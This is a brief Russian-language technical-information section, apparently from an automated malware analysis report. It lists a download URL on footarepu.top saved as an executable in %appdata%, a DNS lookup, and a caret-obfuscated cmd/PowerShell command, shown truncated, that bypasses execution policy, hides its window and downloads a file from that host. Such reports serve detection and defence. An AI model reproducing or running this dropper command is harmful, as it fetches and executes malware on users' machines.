Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wE^rSH^e^lL^.EX^e^ -eXe^CUti^ONPo^licY by^pAS^S -NOP^RoF^iL^E -Wi^n^DOwsTYLe^ hIDD^En^ ^(nEW^-oB^je^c^t Sys^TEM^.n^eT^.wEBC^lIE^nT^).dowNL^oAdfiL^e('http://footarepu.top/read...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "po^wE^rSH^e^lL^.EX^e^ -eXe^CUti^ONPo^licY by^pAS^S -NOP^RoF^iL^E -Wi^n^DOwsTYLe^ hIDD^En^ ^(nEW^-oB^je^c^t Sys^TEM^.n^eT^.wEBC^lIE^nT^).dowNL^oAdfiL^e('http://footarepu.top/read...' (со скрытым окном)